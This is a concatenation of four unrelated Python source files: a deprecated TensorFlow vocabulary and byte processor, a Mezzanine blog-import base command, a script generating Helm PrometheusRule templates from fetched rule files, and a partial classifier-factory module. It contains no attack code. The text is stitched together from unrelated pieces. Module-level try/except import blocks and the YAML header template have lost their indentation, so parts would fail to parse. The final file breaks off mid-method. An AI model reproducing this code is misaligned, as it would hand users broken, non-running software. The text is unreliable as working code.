"""Implements a number of text preprocessing utilities (deprecated).
This module and all its submodules are deprecated. See
[contrib/learn/README.md](https://www.tensorflow.org/code/tensorflow/contrib/learn/README.md)
for migration instructions.
"""
from __future__ import absolute_import
from __future__ import division
from __future__ import print_function
import re
import numpy as np
import six
from tensorflow.python.platform import gfile
from tensorflow.python.util.deprecation import deprecated
from .categorical_vocabulary import CategoricalVocabulary # pylint: disable=g-bad-import-order
try:
# pylint: disable=g-import-not-at-top
import cPickle as pickle
except ImportError:
# pylint: disable=g-import-not-at-top
import pickle
# Word tokenizer pattern, tried in order: (1) runs of 2+ capitals not followed
# by a lowercase letter (acronyms), (2) a capitalized word followed by another
# capital (splits CamelCase), (3) runs of word chars, apostrophes and hyphens.
TOKENIZER_RE = re.compile(r"[A-Z]{2,}(?![a-z])|[A-Z][a-z]+(?=[A-Z])|[\'\w\-]+",
                          re.UNICODE)
@deprecated(None, 'Please use tensorflow/transform or tf.data.')
def tokenizer(iterator):
    """Tokenizer generator.

    Lazily splits every string yielded by ``iterator`` into tokens using
    the module-level ``TOKENIZER_RE`` pattern.

    Args:
        iterator: Input iterator with strings.

    Yields:
        array of tokens per each value in the input.
    """
    for document in iterator:
        yield TOKENIZER_RE.findall(document)
@deprecated(None, 'Please use tensorflow/transform or tf.data.')
class ByteProcessor(object):
    """Maps documents into sequence of ids for bytes.

    Each document is encoded as its raw utf-8 bytes, trimmed/zero-padded
    to ``max_document_length``; ``reverse`` decodes such arrays back to text.

    THIS CLASS IS DEPRECATED. See
    [contrib/learn/README.md](https://www.tensorflow.org/code/tensorflow/contrib/learn/README.md)
    for general migration instructions.
    """

    @deprecated(None, 'Please use tensorflow/transform or tf.data.')
    def __init__(self, max_document_length):
        # Documents longer than this are trimmed; shorter ones zero-padded.
        self.max_document_length = max_document_length

    def fit(self, x):
        """Does nothing. No fitting required."""
        pass

    def fit_transform(self, x):
        """Calls transform."""
        return self.transform(x)

    # pylint: disable=no-self-use
    def reverse(self, x):
        """Reverses output of transform back to text.

        Args:
            x: iterator or matrix of integers. Document representation in bytes.

        Yields:
            Iterators of utf-8 strings.
        """
        for data in x:
            # Drop trailing zero padding, then get the raw bytes.
            # tobytes() replaces tostring(), which was deprecated since
            # NumPy 1.19 and removed in NumPy 2.0; the output is identical.
            document = np.trim_zeros(data.astype(np.int8), trim='b').tobytes()
            try:
                yield document.decode('utf-8')
            except UnicodeDecodeError:
                # Truncation may cut a multi-byte character in half.
                yield ''

    def transform(self, x):
        """Transforms input documents into sequence of ids.

        Args:
            x: iterator or list of input documents.
                Documents can be bytes or unicode strings, which will be encoded
                as utf-8 to map to bytes. Note, in Python2 str and bytes is the
                same type.

        Yields:
            iterator of byte ids.
        """
        if six.PY3:
            # For Python3 defined buffer as memoryview.
            buffer_or_memoryview = memoryview
        else:
            buffer_or_memoryview = buffer  # pylint: disable=undefined-variable
        for document in x:
            if isinstance(document, six.text_type):
                document = document.encode('utf-8')
            document_mv = buffer_or_memoryview(document)
            # Zero-copy view of the first max_document_length bytes,
            # zero-padded on the right up to the fixed length.
            buff = np.frombuffer(document_mv[:self.max_document_length],
                                 dtype=np.uint8)
            yield np.pad(buff, (0, self.max_document_length - len(buff)), 'constant')
class VocabularyProcessor(object):
    """Maps documents to sequences of word ids.

    THIS CLASS IS DEPRECATED. See
    [contrib/learn/README.md](https://www.tensorflow.org/code/tensorflow/contrib/learn/README.md)
    for general migration instructions.
    """

    @deprecated(None, 'Please use tensorflow/transform or tf.data.')
    def __init__(self,
                 max_document_length,
                 min_frequency=0,
                 vocabulary=None,
                 tokenizer_fn=None):
        """Initializes a VocabularyProcessor instance.

        Args:
            max_document_length: Maximum length of documents.
                if documents are longer, they will be trimmed, if shorter - padded.
            min_frequency: Minimum frequency of words in the vocabulary.
            vocabulary: CategoricalVocabulary object.
            tokenizer_fn: Optional callable mapping an iterable of documents to
                an iterable of token lists; defaults to the module-level
                ``tokenizer`` generator.

        Attributes:
            vocabulary_: CategoricalVocabulary object.
        """
        self.max_document_length = max_document_length
        self.min_frequency = min_frequency
        if vocabulary:
            self.vocabulary_ = vocabulary
        else:
            self.vocabulary_ = CategoricalVocabulary()
        if tokenizer_fn:
            self._tokenizer = tokenizer_fn
        else:
            self._tokenizer = tokenizer

    def fit(self, raw_documents, unused_y=None):
        """Learn a vocabulary dictionary of all tokens in the raw documents.

        Args:
            raw_documents: An iterable which yield either str or unicode.
            unused_y: to match fit format signature of estimators.

        Returns:
            self
        """
        for tokens in self._tokenizer(raw_documents):
            for token in tokens:
                self.vocabulary_.add(token)
        # Drop rare tokens, then freeze so transform() can't grow the vocab.
        if self.min_frequency > 0:
            self.vocabulary_.trim(self.min_frequency)
        self.vocabulary_.freeze()
        return self

    def fit_transform(self, raw_documents, unused_y=None):
        """Learn the vocabulary dictionary and return indexies of words.

        NOTE(review): iterates ``raw_documents`` twice (fit, then transform),
        so it must be a re-iterable sequence, not a one-shot generator.

        Args:
            raw_documents: An iterable which yield either str or unicode.
            unused_y: to match fit_transform signature of estimators.

        Returns:
            x: iterable, [n_samples, max_document_length]. Word-id matrix.
        """
        self.fit(raw_documents)
        return self.transform(raw_documents)

    def transform(self, raw_documents):
        """Transform documents to word-id matrix.

        Convert words to ids with vocabulary fitted with fit or the one
        provided in the constructor.

        Args:
            raw_documents: An iterable which yield either str or unicode.

        Yields:
            x: iterable, [n_samples, max_document_length]. Word-id matrix.
        """
        for tokens in self._tokenizer(raw_documents):
            # Fixed-width row: unused tail positions stay 0.
            word_ids = np.zeros(self.max_document_length, np.int64)
            for idx, token in enumerate(tokens):
                if idx >= self.max_document_length:
                    break
                word_ids[idx] = self.vocabulary_.get(token)
            yield word_ids

    def reverse(self, documents):
        """Reverses output of vocabulary mapping to words.

        Args:
            documents: iterable, list of class ids.

        Yields:
            Iterator over mapped in words documents.
        """
        for item in documents:
            output = []
            for class_id in item:
                output.append(self.vocabulary_.reverse(class_id))
            yield ' '.join(output)

    def save(self, filename):
        """Saves vocabulary processor into given file.

        Args:
            filename: Path to output file.
        """
        with gfile.Open(filename, 'wb') as f:
            f.write(pickle.dumps(self))

    @classmethod
    def restore(cls, filename):
        """Restores vocabulary processor from given file.

        NOTE(review): uses pickle — only restore files from a trusted source.

        Args:
            filename: Path to file to load from.

        Returns:
            VocabularyProcessor object.
        """
        with gfile.Open(filename, 'rb') as f:
            return pickle.loads(f.read())
|
|
from __future__ import print_function, unicode_literals
from future.builtins import input, int
from optparse import make_option
try:
from urllib.parse import urlparse
except:
from urlparse import urlparse
from django.contrib.auth import get_user_model
from django.contrib.redirects.models import Redirect
from django.contrib.sites.models import Site
from django.core.management.base import BaseCommand, CommandError
from django.utils.encoding import force_text
from django.utils.html import strip_tags
from mezzanine.blog.models import BlogPost, BlogCategory
from mezzanine.conf import settings
from mezzanine.core.models import CONTENT_STATUS_DRAFT
from mezzanine.core.models import CONTENT_STATUS_PUBLISHED
from mezzanine.generic.models import AssignedKeyword, Keyword, ThreadedComment
from mezzanine.pages.models import RichTextPage
from mezzanine.utils.html import decode_entities
# Resolve the active user model once (honours the AUTH_USER_MODEL setting).
User = get_user_model()
class BaseImporterCommand(BaseCommand):
    """
    Base importer command for blogging platform specific management
    commands to subclass when importing blog posts into Mezzanine.
    The ``handle_import`` method should be overridden to provide the
    import mechanism specific to the blogging platform being dealt with.
    """

    # Command-line options shared by every importer subclass
    # (legacy optparse ``option_list`` style).
    option_list = BaseCommand.option_list + (
        make_option("-m", "--mezzanine-user", dest="mezzanine_user",
                    help="Mezzanine username to assign the imported blog posts to."),
        make_option("--noinput", action="store_false", dest="interactive",
                    default=True, help="Do NOT prompt for input of any kind. "
                    "Fields will be truncated if too long."),
        make_option("-n", "--navigation", action="store_true",
                    dest="in_navigation", help="Add any imported pages to navigation"),
        make_option("-f", "--footer", action="store_true", dest="in_footer",
                    help="Add any imported pages to footer navigation"),
    )

    def __init__(self, **kwargs):
        # Accumulators filled by ``handle_import`` via add_post/add_page,
        # then persisted by ``handle``.
        self.posts = []
        self.pages = []
        super(BaseImporterCommand, self).__init__(**kwargs)

    def add_post(self, title=None, content=None, old_url=None, pub_date=None,
                 tags=None, categories=None, comments=None):
        """
        Adds a post to the post list for processing.

        - ``title`` and ``content`` are strings for the post.
        - ``old_url`` is a string that a redirect will be created for.
        - ``pub_date`` is assumed to be a ``datetime`` object.
        - ``tags`` and ``categories`` are sequences of strings.
        - ``comments`` is a sequence of dicts - each dict should be the
          return value of ``add_comment``.
        """
        if not title:
            # Fall back to the first sentence of the body as the title.
            title = strip_tags(content).split(". ")[0]
        title = decode_entities(title)
        if categories is None:
            categories = []
        if tags is None:
            tags = []
        if comments is None:
            comments = []
        self.posts.append({
            "title": force_text(title),
            "publish_date": pub_date,
            "content": force_text(content),
            "categories": categories,
            "tags": tags,
            "comments": comments,
            "old_url": old_url,
        })
        # Return the dict so callers (e.g. add_comment) can append to it.
        return self.posts[-1]

    def add_page(self, title=None, content=None, old_url=None,
                 tags=None, old_id=None, old_parent_id=None):
        """
        Adds a page to the list of pages to be imported - used by the
        Wordpress importer.
        """
        if not title:
            text = decode_entities(strip_tags(content)).replace("\n", " ")
            title = text.split(". ")[0]
        if tags is None:
            tags = []
        self.pages.append({
            "title": title,
            "content": content,
            "tags": tags,
            "old_url": old_url,
            "old_id": old_id,
            "old_parent_id": old_parent_id,
        })

    def add_comment(self, post=None, name=None, email=None, pub_date=None,
                    website=None, body=None):
        """
        Adds a comment to the post provided.
        """
        if post is None:
            if not self.posts:
                raise CommandError("Cannot add comments without posts")
            # Default to the most recently added post.
            post = self.posts[-1]
        post["comments"].append({
            "user_name": name,
            "user_email": email,
            "submit_date": pub_date,
            "user_url": website,
            "comment": body,
        })

    def trunc(self, model, prompt, **fields):
        """
        Truncates fields values for the given model. Prompts for a new
        value if truncation occurs.
        """
        for field_name, value in fields.items():
            field = model._meta.get_field(field_name)
            max_length = getattr(field, "max_length", None)
            if not max_length:
                continue
            elif not prompt:
                # Non-interactive mode (--noinput): silently truncate.
                fields[field_name] = value[:max_length]
                continue
            # Interactive: keep prompting until the value fits.
            while len(value) > max_length:
                encoded_value = value.encode("utf-8")
                new_value = input("The value for the field %s.%s exceeds "
                                  "its maximum length of %s chars: %s\n\nEnter a new value "
                                  "for it, or press return to have it truncated: " %
                                  (model.__name__, field_name, max_length, encoded_value))
                value = new_value if new_value else value[:max_length]
            fields[field_name] = value
        return fields

    def handle(self, *args, **options):
        """
        Processes the converted data into the Mezzanine database correctly.

        Attributes:
            mezzanine_user: the user to put this data in against
            date_format: the format the dates are in for posts and comments
        """
        mezzanine_user = options.get("mezzanine_user")
        site = Site.objects.get_current()
        verbosity = int(options.get("verbosity", 1))
        prompt = options.get("interactive")
        # Validate the Mezzanine user.
        if mezzanine_user is None:
            raise CommandError("No Mezzanine user has been specified")
        try:
            mezzanine_user = User.objects.get(username=mezzanine_user)
        except User.DoesNotExist:
            raise CommandError("Invalid Mezzanine user: %s" % mezzanine_user)
        # Run the subclassed ``handle_import`` and save posts, tags,
        # categories, and comments to the DB.
        self.handle_import(options)
        for post_data in self.posts:
            categories = post_data.pop("categories")
            tags = post_data.pop("tags")
            comments = post_data.pop("comments")
            old_url = post_data.pop("old_url")
            post_data = self.trunc(BlogPost, prompt, **post_data)
            initial = {
                "title": post_data.pop("title"),
                "user": mezzanine_user,
            }
            # No publish date means the source post was an unpublished draft.
            if post_data["publish_date"] is None:
                post_data["status"] = CONTENT_STATUS_DRAFT
            post, created = BlogPost.objects.get_or_create(**initial)
            for k, v in post_data.items():
                setattr(post, k, v)
            post.save()
            if created and verbosity >= 1:
                print("Imported post: %s" % post)
            for name in categories:
                cat = self.trunc(BlogCategory, prompt, title=name)
                if not cat["title"]:
                    continue
                cat, created = BlogCategory.objects.get_or_create(**cat)
                if created and verbosity >= 1:
                    print("Imported category: %s" % cat)
                post.categories.add(cat)
            for comment in comments:
                comment = self.trunc(ThreadedComment, prompt, **comment)
                comment["site"] = site
                post.comments.create(**comment)
                if verbosity >= 1:
                    print("Imported comment by: %s" % comment["user_name"])
            self.add_meta(post, tags, prompt, verbosity, old_url)

        # Create any pages imported (Wordpress can include pages)
        in_menus = []
        footer = [menu[0] for menu in settings.PAGE_MENU_TEMPLATES
                  if menu[-1] == "pages/menus/footer.html"]
        if options["in_navigation"]:
            in_menus = [menu[0] for menu in settings.PAGE_MENU_TEMPLATES]
            if footer and not options["in_footer"]:
                in_menus.remove(footer[0])
        elif footer and options["in_footer"]:
            in_menus = footer
        parents = []
        for page in self.pages:
            tags = page.pop("tags")
            old_url = page.pop("old_url")
            old_id = page.pop("old_id")
            old_parent_id = page.pop("old_parent_id")
            page = self.trunc(RichTextPage, prompt, **page)
            page["status"] = CONTENT_STATUS_PUBLISHED
            page["in_menus"] = in_menus
            page, created = RichTextPage.objects.get_or_create(**page)
            if created and verbosity >= 1:
                print("Imported page: %s" % page)
            self.add_meta(page, tags, prompt, verbosity, old_url)
            # Remember source-platform ids so parents can be wired up below.
            parents.append({
                'old_id': old_id,
                'old_parent_id': old_parent_id,
                'page': page,
            })

        # Second pass: every page now exists, so parent links recorded via
        # the source platform's ids can be resolved.
        for obj in parents:
            if obj['old_parent_id']:
                for parent in parents:
                    if parent['old_id'] == obj['old_parent_id']:
                        obj['page'].parent = parent['page']
                        obj['page'].save()
                        break

    def add_meta(self, obj, tags, prompt, verbosity, old_url=None):
        """
        Adds tags and a redirect for the given obj, which is a blog
        post or a page.
        """
        for tag in tags:
            keyword = self.trunc(Keyword, prompt, title=tag)
            keyword, created = Keyword.objects.get_or_create_iexact(**keyword)
            obj.keywords.create(keyword=keyword)
            if created and verbosity >= 1:
                print("Imported tag: %s" % keyword)
        if old_url is not None:
            # Only create a redirect when the old URL has a non-root path.
            old_path = urlparse(old_url).path
            if not old_path.strip("/"):
                return
            redirect = self.trunc(Redirect, prompt, old_path=old_path)
            redirect['site'] = Site.objects.get_current()
            redirect, created = Redirect.objects.get_or_create(**redirect)
            redirect.new_path = obj.get_absolute_url()
            redirect.save()
            if created and verbosity >= 1:
                print("Created redirect for: %s" % old_url)

    def handle_import(self, options):
        """
        Should be overridden by subclasses - performs the conversion from
        the originating data source into the lists of posts and comments
        ready for processing.
        """
        raise NotImplementedError
|
|
#!/usr/bin/env python3
"""Fetch alerting and aggregation rules from provided urls into this chart."""
import textwrap
from os import makedirs
import requests
import yaml
from yaml.representer import SafeRepresenter
# https://stackoverflow.com/a/20863889/961092
class LiteralStr(str):
    """Marker subclass: strings of this type are emitted by PyYAML in literal
    block style ('|') via the representer registered in init_yaml_styles()."""
    pass
def change_style(style, representer):
    """Wrap a YAML *representer* so that every scalar it produces is tagged
    with the given *style* (e.g. '|' for literal blocks)."""
    def styled_representer(dumper, data):
        node = representer(dumper, data)
        node.style = style
        return node
    return styled_representer
# Source files list
charts = [
{
'source': 'https://raw.githubusercontent.com/coreos/kube-prometheus/master/manifests/prometheus-rules.yaml',
'destination': '../templates/prometheus/rules-1.14',
'min_kubernetes': '1.14.0-0'
},
{
'source': 'https://raw.githubusercontent.com/etcd-io/etcd/master/Documentation/op-guide/etcd3_alert.rules.yml',
'destination': '../templates/prometheus/rules-1.14',
'min_kubernetes': '1.14.0-0'
},
{
'source': 'https://raw.githubusercontent.com/coreos/kube-prometheus/release-0.1/manifests/prometheus-rules.yaml',
'destination': '../templates/prometheus/rules',
'min_kubernetes': '1.10.0-0',
'max_kubernetes': '1.14.0-0'
},
{
'source': 'https://raw.githubusercontent.com/etcd-io/etcd/master/Documentation/op-guide/etcd3_alert.rules.yml',
'destination': '../templates/prometheus/rules',
'min_kubernetes': '1.10.0-0',
'max_kubernetes': '1.14.0-0'
},
]
# Additional conditions map
condition_map = {
'alertmanager.rules': ' .Values.defaultRules.rules.alertmanager',
'general.rules': ' .Values.defaultRules.rules.general',
'k8s.rules': ' .Values.defaultRules.rules.k8s',
'kube-apiserver.rules': ' .Values.kubeApiServer.enabled .Values.defaultRules.rules.kubeApiserver',
'kube-prometheus-node-alerting.rules': ' .Values.defaultRules.rules.kubePrometheusNodeAlerting',
'kube-prometheus-node-recording.rules': ' .Values.defaultRules.rules.kubePrometheusNodeRecording',
'kube-scheduler.rules': ' .Values.kubeScheduler.enabled .Values.defaultRules.rules.kubeScheduler',
'kubernetes-absent': ' .Values.defaultRules.rules.kubernetesAbsent',
'kubernetes-resources': ' .Values.defaultRules.rules.kubernetesResources',
'kubernetes-storage': ' .Values.defaultRules.rules.kubernetesStorage',
'kubernetes-system': ' .Values.defaultRules.rules.kubernetesSystem',
'kubernetes-system-controller-manager': ' .Values.kubeControllerManager.enabled',
'kubernetes-system-scheduler': ' .Values.kubeScheduler.enabled .Values.defaultRules.rules.kubeScheduler',
'node-exporter.rules': ' .Values.nodeExporter.enabled .Values.defaultRules.rules.node',
'node-exporter': ' .Values.nodeExporter.enabled .Values.defaultRules.rules.node',
'node.rules': ' .Values.nodeExporter.enabled .Values.defaultRules.rules.node',
'node-network': ' .Values.defaultRules.rules.network',
'node-time': ' .Values.defaultRules.rules.time',
'prometheus-operator': ' .Values.defaultRules.rules.prometheusOperator',
'prometheus.rules': ' .Values.defaultRules.rules.prometheus',
'kubernetes-apps': ' .Values.kubeStateMetrics.enabled .Values.defaultRules.rules.kubernetesApps',
'etcd': ' .Values.kubeEtcd.enabled .Values.defaultRules.rules.etcd',
}
alert_condition_map = {
'KubeAPIDown': '.Values.kubeApiServer.enabled', # there are more alerts which are left enabled, because they'll never fire without metrics
'KubeControllerManagerDown': '.Values.kubeControllerManager.enabled',
'KubeSchedulerDown': '.Values.kubeScheduler.enabled',
'KubeStateMetricsDown': '.Values.kubeStateMetrics.enabled', # there are more alerts which are left enabled, because they'll never fire without metrics
'KubeletDown': '.Values.prometheusOperator.kubeletService.enabled', # there are more alerts which are left enabled, because they'll never fire without metrics
'PrometheusOperatorDown': '.Values.prometheusOperator.enabled',
'NodeExporterDown': '.Values.nodeExporter.enabled',
'CoreDNSDown': '.Values.kubeDns.enabled',
'AlertmanagerDown': '.Values.alertmanager.enabled',
}
replacement_map = {
'job="prometheus-operator"': {
'replacement': 'job="{{ $operatorJob }}"',
'init': '{{- $operatorJob := printf "%s-%s" (include "prometheus-operator.fullname" .) "operator" }}'},
'job="prometheus-k8s"': {
'replacement': 'job="{{ $prometheusJob }}"',
'init': '{{- $prometheusJob := printf "%s-%s" (include "prometheus-operator.fullname" .) "prometheus" }}'},
'job="alertmanager-main"': {
'replacement': 'job="{{ $alertmanagerJob }}"',
'init': '{{- $alertmanagerJob := printf "%s-%s" (include "prometheus-operator.fullname" .) "alertmanager" }}'},
'namespace="monitoring"': {
'replacement': 'namespace="{{ $namespace }}"',
'init': '{{- $namespace := .Release.Namespace }}'},
'alertmanager-$1': {
'replacement': '$1',
'init': ''},
}
# standard header
header = '''# Generated from '%(name)s' group from %(url)s
# Do not change in-place! In order to change this file first read following link:
# https://github.com/helm/charts/tree/master/stable/prometheus-operator/hack
{{- $kubeTargetVersion := default .Capabilities.KubeVersion.GitVersion .Values.kubeTargetVersionOverride }}
{{- if and (semverCompare ">=%(min_kubernetes)s" $kubeTargetVersion) (semverCompare "<%(max_kubernetes)s" $kubeTargetVersion) .Values.defaultRules.create%(condition)s }}%(init_line)s
apiVersion: monitoring.coreos.com/v1
kind: PrometheusRule
metadata:
name: {{ printf "%%s-%%s" (include "prometheus-operator.fullname" .) "%(name)s" | trunc 63 | trimSuffix "-" }}
labels:
app: {{ template "prometheus-operator.name" . }}
{{ include "prometheus-operator.labels" . | indent 4 }}
{{- if .Values.defaultRules.labels }}
{{ toYaml .Values.defaultRules.labels | indent 4 }}
{{- end }}
{{- if .Values.defaultRules.annotations }}
annotations:
{{ toYaml .Values.defaultRules.annotations | indent 4 }}
{{- end }}
spec:
groups:
-'''
def init_yaml_styles():
    """Register a literal-block ('|') representer for LiteralStr with PyYAML."""
    literal_repr = change_style('|', SafeRepresenter.represent_str)
    yaml.add_representer(LiteralStr, literal_repr)
def escape(s):
    """Escape helm template markers so the output stays literal YAML text."""
    # '{{' -> '{{`{{' and '}}' -> '}}`}}' (helm backtick-quoting)
    for marker in ("{{", "}}"):
        s = s.replace(marker, marker + "`" + marker)
    return s
def fix_expr(rules):
    """Normalize rule expressions in place.

    Strips trailing whitespace/line breaks that creep in via the YAML
    import, and marks multiline expressions as LiteralStr so they are
    dumped in literal (|-) style.
    """
    for entry in rules:
        cleaned = entry['expr'].rstrip()
        entry['expr'] = LiteralStr(cleaned) if '\n' in cleaned else cleaned
def yaml_str_repr(struct, indent=4):
    """Render `struct` as a helm-escaped, indented YAML string.

    Line wrapping and flow style are disabled so every item keeps its own
    line; the very first line keeps one space less of indentation so it can
    directly follow the '-' of a list item in the surrounding template.
    """
    dumped = yaml.dump(struct, width=1000, default_flow_style=False)
    dumped = escape(dumped)  # protect {{ and }} from helm
    # indent every line, then drop (indent - 1) chars from the first one
    return textwrap.indent(dumped, ' ' * indent)[indent - 1:]
def add_rules_conditions(rules: str, indent: int = 4) -> str:
    """Add if wrapper for rules, listed in alert_condition_map.

    `rules` is the rendered YAML text of one rule group.  For every alert
    that has an enable-flag in alert_condition_map, its '- alert: NAME'
    entry is wrapped in '{{- if <flag> }}' ... '{{- end }}' by splicing
    lines into the string; the text is returned (strings are immutable).
    """
    rule_condition = '{{- if %s }}\n'
    for alert_name in alert_condition_map:
        line_start = ' ' * indent + '- alert: '
        if line_start + alert_name in rules:
            rule_text = rule_condition % alert_condition_map[alert_name]
            # add if condition
            index = rules.index(line_start + alert_name)
            rules = rules[:index] + rule_text + rules[index:]
            # add end of if
            try:
                # the block ends where the next alert entry begins
                next_index = rules.index(line_start, index + len(rule_text) + 1)
            except ValueError:
                # we found the last alert in file if there are no alerts after it
                next_index = len(rules)
            # depending on the rule ordering in alert_condition_map it's possible that an if statement from another rule is present at the end of this block.
            found_block_end = False
            last_line_index = next_index
            while not found_block_end:
                # walk backwards one line at a time so our '{{- end }}' is
                # inserted before any '{{- if' lines already added for the
                # following alert
                last_line_index = rules.rindex('\n', index, last_line_index - 1) # find the starting position of the last line
                last_line = rules[last_line_index + 1:next_index]
                if last_line.startswith('{{- if'):
                    next_index = last_line_index + 1 # move next_index back if the current block ends in an if statement
                    continue
                found_block_end = True
            rules = rules[:next_index] + '{{- end }}\n' + rules[next_index:]
    return rules
def write_group_to_file(group, url, destination, min_kubernetes, max_kubernetes):
    """Render one rule group as a helm template and write it to
    <destination>/<group name>.yaml, overwriting any previous file."""
    fix_expr(group['rules'])
    # prepare the string representation of the rules
    rendered = yaml_str_repr(group)
    # substitute hard-coded upstream values with template variables and
    # collect the initialisation lines those variables require
    init_line = ''
    for needle, subst in replacement_map.items():
        if needle in rendered:
            rendered = rendered.replace(needle, subst['replacement'])
            if subst['init']:
                init_line += '\n' + subst['init']
    # wrap individual alerts in their enable-flag conditions
    rendered = add_rules_conditions(rendered)
    # header, rules body, footer
    content = header % {
        'name': group['name'],
        'url': url,
        'condition': condition_map.get(group['name'], ''),
        'init_line': init_line,
        'min_kubernetes': min_kubernetes,
        'max_kubernetes': max_kubernetes
    }
    content += rendered
    content += '{{- end }}'
    target = "%s/%s" % (destination, group['name'] + '.yaml')
    # make sure directories to store the file exist
    makedirs(destination, exist_ok=True)
    # recreate the file
    with open(target, 'w') as stream:
        stream.write(content)
    print("Generated %s" % target)
def main():
    """Download every configured rules file and emit one helm template per
    rule group."""
    init_yaml_styles()
    # read the rules, create a new template file per group
    for chart in charts:
        print("Generating rules from %s" % chart['source'])
        response = requests.get(chart['source'])
        if response.status_code != 200:
            print('Skipping the file, response code %s not equals 200' % response.status_code)
            continue
        document = yaml.full_load(response.text)
        chart.setdefault('max_kubernetes', "9.9.9-9")
        # etcd workaround, their file don't have spec level
        groups = document['spec']['groups'] if document.get('spec') else document['groups']
        for group in groups:
            write_group_to_file(group, chart['source'], chart['destination'],
                                chart['min_kubernetes'], chart['max_kubernetes'])
    print("Finished")


if __name__ == '__main__':
    main()
|
|
"""
**Factory** provides convenient way to train several classifiers on the same dataset.
These classifiers can be trained one-by-one in a single thread, or simultaneously
with IPython cluster or in several threads.
`Factory` also allows comparison of several classifiers (whose predictions can be computed in parallel).
"""
from __future__ import division, print_function, absolute_import
from abc import ABCMeta, abstractmethod
from collections import OrderedDict
import time
from sklearn.base import BaseEstimator, RegressorMixin, ClassifierMixin
from ..report import classification, regression
from ..estimators.interface import Classifier, Regressor
from ..estimators.sklearn import SklearnClassifier, SklearnRegressor
from . import utils
__author__ = 'Tatiana Likhomanenko'
class AbstractFactory(OrderedDict):
    """
    Base class for factories of estimators (classifiers or regressors).

    A factory is an ordered mapping from model name to estimator; it can
    train all contained estimators on one dataset so that their quality can
    later be compared.

    .. Note: don't use this class, but it's ancestors.
    """
    __metaclass__ = ABCMeta

    def fit(self, X, y, sample_weight=None, parallel_profile=None, features=None):
        """
        Train all estimators on the same data.

        :param X: pandas.DataFrame of shape [n_samples, n_features] with features
        :param y: array-like of shape [n_samples] with labels of samples
        :param sample_weight: weights of events,
               array-like of shape [n_samples] or None if all weights are equal
        :param features: features to train estimators
               If None, estimators will be trained on `estimator.features`
        :type features: None or list[str]
        :param parallel_profile: profile of parallel execution system or None
        :type parallel_profile: None or str
        :return: self
        """
        if features is not None:
            # switch every estimator to the common feature list, warning
            # when this overrides an explicitly configured one
            for label, model in self.items():
                if model.features is not None:
                    print('Overwriting features of estimator ' + label)
                self[label].set_params(features=features)

        started_at = time.time()
        outcome = utils.map_on_cluster(parallel_profile, train_estimator,
                                       list(self.keys()), list(self.values()),
                                       [X] * len(self), [y] * len(self),
                                       [sample_weight] * len(self))
        for status, payload in outcome:
            if status == 'success':
                label, fitted, seconds = payload
                self[label] = fitted
                print('model {:12} was trained in {:.2f} seconds'.format(label, seconds))
            else:
                print('Problem while training on the node, report:\n', payload)
        print("Totally spent {:.2f} seconds on training".format(time.time() - started_at))
        return self

    def fit_lds(self, lds, parallel_profile=None, features=None):
        """
        Fit all estimators on the same dataset.

        :param LabeledDataStorage lds: dataset
        :param features: features to train estimators
               If None, estimators will be trained on `estimator.features`
        :param parallel_profile: profile of parallel execution system or None
        :type parallel_profile: None or str
        :return: self
        """
        data, labels, weights = lds.get_data(features), lds.get_targets(), lds.get_weights()
        return self.fit(data, labels, sample_weight=weights,
                        parallel_profile=parallel_profile, features=features)

    @abstractmethod
    def predict(self, X, parallel_profile=None):
        """
        Predict labels (or values for regressors) for all events in dataset.

        :param X: pandas.DataFrame of shape [n_samples, n_features]
        :param parallel_profile: profile of parallel execution system or None
        :type parallel_profile: None or str
        :rtype: OrderedDict[numpy.array of shape [n_samples] with integer labels (or values)]
        """
        pass

    @abstractmethod
    def test_on_lds(self, lds):
        """
        Prepare report for factory (comparison of all models).

        :param LabeledDataStorage lds: data
        :rtype: rep.report.classification.ClassificationReport or rep.report.regression.RegressionReport
        """
        pass

    def test_on(self, X, y, sample_weight=None):
        """
        Prepare report for factory (comparison of all models).

        :param X: pandas.DataFrame of shape [n_samples, n_features] with features
        :param y: numpy.array of shape [n_samples] with targets
        :param sample_weight: weight of events,
               array-like of shape [n_samples] or None if all weights are equal
        :rtype: rep.report.classification.ClassificationReport or rep.report.regression.RegressionReport
        """
        from ..data import LabeledDataStorage
        storage = LabeledDataStorage(X, target=y, sample_weight=sample_weight)
        return self.test_on_lds(storage)
class ClassifiersFactory(AbstractFactory):
    """
    Factory that trains several classifiers in parallel so that their
    quality can be compared.
    """

    def add_classifier(self, name, classifier):
        """
        Add a classifier to the factory.
        A raw sklearn classifier is automatically wrapped with :class:`SklearnClassifier`.

        :param str name: unique name for classifier.
            If name coincides with one already used, the old classifier will be replaced by one passed.
        :param classifier: classifier object

        .. note:: if type == sklearn.base.BaseEstimator, then features=None is used,
            to specify features used by classifier, wrap it with `SklearnClassifier`

        :type classifier: sklearn.base.BaseEstimator or estimators.interface.Classifier
        """
        if isinstance(classifier, Classifier):
            wrapped = classifier
        elif isinstance(classifier, BaseEstimator) and isinstance(classifier, ClassifierMixin):
            wrapped = SklearnClassifier(classifier)
        else:
            raise NotImplementedError(
                'Supports only instances of sklearn.base.BaseEstimator or rep.estimators.interface.Classifier')
        self[name] = wrapped

    def predict(self, X, parallel_profile=None):
        """
        Predict labels for all events in dataset.

        :param X: pandas.DataFrame of shape [n_samples, n_features]
        :param parallel_profile: profile for IPython cluster
        :type parallel_profile: None or str
        :rtype: OrderedDict[numpy.array of shape [n_samples] with integer labels]
        """
        return self._predict_method(X, parallel_profile=parallel_profile,
                                    prediction_type='classification')

    def predict_proba(self, X, parallel_profile=None):
        """
        Predict probabilities for all events in dataset.

        :param X: pandas.DataFrame of shape [n_samples, n_features]
        :param parallel_profile: profile
        :type parallel_profile: None or str
        :rtype: OrderedDict[numpy.array of shape [n_samples] with float predictions]
        """
        return self._predict_method(X, parallel_profile=parallel_profile,
                                    prediction_type='classification-proba')

    def _predict_method(self, X, parallel_profile=None, prediction_type='classification'):
        """
        Common driver behind predict/predict_proba: fan prediction out over
        the cluster (or threads) and collect per-model results.

        :param X: pandas.DataFrame of shape [n_samples, n_features]
        :param parallel_profile: profile
        :type parallel_profile: None or str
        :param str prediction_type: 'classification' or 'regression' or 'classification-proba'
        :rtype: OrderedDict[numpy.array of shape [n_samples] with float predictions]
        """
        predictions = OrderedDict()
        started_at = time.time()
        outcome = utils.map_on_cluster(parallel_profile, predict_estimator,
                                       list(self.keys()), list(self.values()),
                                       [X] * len(self), [prediction_type] * len(self))
        for status, payload in outcome:
            if status == 'success':
                label, prob, seconds = payload
                predictions[label] = prob
                print('data was predicted by {:12} in {:.2f} seconds'.format(label, seconds))
            else:
                print('Problem while predicting on the node, report:\n', payload)
